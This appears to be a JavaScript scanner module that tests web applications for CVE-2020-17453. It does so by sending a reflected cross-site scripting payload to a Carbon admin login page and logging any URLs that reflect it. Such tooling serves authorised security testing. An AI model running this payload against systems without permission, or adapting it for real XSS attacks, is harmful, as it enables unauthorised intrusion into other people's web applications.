cve-2020-17453/includes/scan.js

CVE-2020-17453 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.

#!/usr/bin/env node

/**
 * CVE-2020-17453
 * CVE-2020-17453 is a powerful scanner for bug bounty hunters and penetration testers to discover vulnerabilities in their web applications.
 *
 * @author karthikeyan V (karthithehacker) <https://karthithehacker.com>
 */

//lib and includes section 
 
var fs = require('fs');
const axios = require('axios');

// Function to scan a URL for CVE-2020-17453 vulnerability
class scan {
    constructor(urli,savepath) {
        async function scanUrlForCVE(url) {
            const payload = "%27%3Balert('XSS')%2F%2F";
            const fullUrl = `${url}/carbon/admin/login.jsp?msgId=${payload}`;
            const response = await axios.get(fullUrl, { validateStatus: null });
            if (response.data.includes(";alert('XSS')//")) {
                console.log(`\n\x1b[31;1m[CVE-2020-17453] \x1b[32;1mR-XSS found \x1b[37;1m===> \x1b[33;3m${fullUrl}\n`);
                if(savepath == null || savepath == true){
                        return;     
                        }
                else{
                    fs.appendFileSync(savepath, fullUrl+"\n", function (err) {
                    if (err) throw err;
                        });
                                
                    }  
            }
            
        }
        scanUrlForCVE(urli);
    }
}
module.exports = {
    scanner: scan
}